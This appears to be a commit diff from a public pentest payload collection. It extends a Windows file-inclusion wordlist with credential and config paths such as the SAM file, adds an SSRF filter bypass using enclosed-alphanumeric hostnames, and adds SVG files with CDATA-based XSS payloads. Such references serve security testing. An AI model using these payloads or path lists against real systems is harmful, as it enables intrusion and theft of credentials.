SVG XSS + SSRF enclosed alphanumerics

This commit is contained in:
Swissky 2017-11-19 14:01:36 +01:00
parent f740d8e825
commit fea88a5738
8 changed files with 83 additions and 63 deletions

View File

@ -2,67 +2,68 @@ php://input
C:\boot.ini C:\boot.ini
C:\WINDOWS\win.ini C:\WINDOWS\win.ini
C:\WINDOWS\php.ini C:\WINDOWS\php.ini
C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini C:\WINNT\php.ini
\xampp\phpMyAdmin\config.inc C:\xampp\phpMyAdmin\config.inc
\xampp\phpMyAdmin\phpinfo.php C:\xampp\phpMyAdmin\phpinfo.php
\xampp\phpmyadmin\config.inc C:\xampp\phpmyadmin\config.inc
\xampp\phpmyadmin\phpinfo.php C:\xampp\phpmyadmin\phpinfo.php
\xampp\phpmyadmin\config.inc.php C:\xampp\phpmyadmin\config.inc.php
\xampp\phpMyAdmin\config.inc.php C:\xampp\phpMyAdmin\config.inc.php
\xampp\apache\conf\httpd.conf C:\xampp\apache\conf\httpd.conf
\xampp\FileZillaFTP\FileZilla Server.xml C:\xampp\FileZillaFTP\FileZilla Server.xml
\xampp\MercuryMail\mercury.ini C:\xampp\MercuryMail\mercury.ini
\mysql\bin\my.ini C:\mysql\bin\my.ini
\xampp\php\php.ini C:\xampp\php\php.ini
\xampp\phpMyAdmin\config.inc.php C:\xampp\phpMyAdmin\config.inc.php
\xampp\tomcat\conf\tomcat-users.xml C:\xampp\tomcat\conf\tomcat-users.xml
\xampp\tomcat\conf\web.xml C:\xampp\tomcat\conf\web.xml
\xampp\sendmail\sendmail.ini C:\xampp\sendmail\sendmail.ini
\xampp\webalizer\webalizer.conf C:\xampp\webalizer\webalizer.conf
\xampp\webdav\webdav.txt C:\xampp\webdav\webdav.txt
\xampp\apache\logs\error.log C:\xampp\apache\logs\error.log
\xampp\apache\logs\access.log C:\xampp\apache\logs\access.log
\xampp\FileZillaFTP\Logs C:\xampp\FileZillaFTP\Logs
\xampp\FileZillaFTP\Logs\error.log C:\xampp\FileZillaFTP\Logs\error.log
\xampp\FileZillaFTP\Logs\access.log C:\xampp\FileZillaFTP\Logs\access.log
\xampp\MercuryMail\LOGS\error.log C:\xampp\MercuryMail\LOGS\error.log
\xampp\MercuryMail\LOGS\access.log C:\xampp\MercuryMail\LOGS\access.log
\xampp\mysql\data\mysql.err C:\xampp\mysql\data\mysql.err
\xampp\sendmail\sendmail.log C:\xampp\sendmail\sendmail.log
\apache\log\error.log C:\apache\log\error.log
\apache\log\access.log C:\apache\log\access.log
\apache\log\error_log C:\apache\log\error_log
\apache\log\access_log C:\apache\log\access_log
\apache2\log\error.log C:\apache2\log\error.log
\apache2\log\access.log C:\apache2\log\access.log
\apache2\log\error_log C:\apache2\log\error_log
\apache2\log\access_log C:\apache2\log\access_log
\log\error.log C:\log\error.log
\log\access.log C:\log\access.log
\log\error_log C:\log\error_log
\log\access_log C:\log\access_log
\apache\logs\error.log C:\apache\logs\error.log
\apache\logs\access.log C:\apache\logs\access.log
\apache\logs\error_log C:\apache\logs\error_log
\apache\logs\access_log C:\apache\logs\access_log
\apache2\logs\error.log C:\apache2\logs\error.log
\apache2\logs\access.log C:\apache2\logs\access.log
\apache2\logs\error_log C:\apache2\logs\error_log
\apache2\logs\access_log C:\apache2\logs\access_log
\logs\error.log C:\logs\error.log
\logs\access.log C:\logs\access.log
\logs\error_log C:\logs\error_log
\logs\access_log C:\logs\access_log
\log\httpd\access_log C:\log\httpd\access_log
\log\httpd\error_log C:\log\httpd\error_log
\logs\httpd\access_log C:\logs\httpd\access_log
\logs\httpd\error_log C:\logs\httpd\error_log
\opt\xampp\logs\access_log C:\opt\xampp\logs\access_log
\opt\xampp\logs\error_log C:\opt\xampp\logs\error_log
\opt\xampp\logs\access.log C:\opt\xampp\logs\access.log
\opt\xampp\logs\error.log C:\opt\xampp\logs\error.log
\Program Files\Apache Group\Apache\logs\access.log C:\Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\error.log C:\Program Files\Apache Group\Apache\logs\error.log
\Program Files\Apache Group\Apache\conf\httpd.conf C:\Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache2\conf\httpd.conf C:\Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files\xampp\apache\conf\httpd.conf C:\Program Files\xampp\apache\conf\httpd.conf

Binary file not shown.

After

Width:  |  Height:  |  Size: 179 KiB

View File

@ -91,6 +91,15 @@ requests + browsers : 2.2.2.2
urllib : 3.3.3.3 urllib : 3.3.3.3
``` ```
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
```
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
List:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
```
## SSRF via URL Scheme ## SSRF via URL Scheme
Dict:// Dict://
The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol: The DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
@ -176,7 +185,9 @@ http://0251.00376.000251.0000376/ Dotted octal with padding
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF) * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648) * [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html) * [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
* [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/) * [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748) * [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/) * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
* [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
* [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)

Binary file not shown.

After

Width:  |  Height:  |  Size: 381 KiB

View File

@ -0,0 +1 @@
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>

After

Width:  |  Height:  |  Size: 62 B

View File

@ -0,0 +1 @@
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>

After

Width:  |  Height:  |  Size: 80 B

View File

@ -0,0 +1 @@
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

After

Width:  |  Height:  |  Size: 64 B

View File

@ -178,6 +178,11 @@ XSS in SVG
XSS in SVG (short) XSS in SVG (short)
``` ```
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
``` ```
XSS in SWF XSS in SWF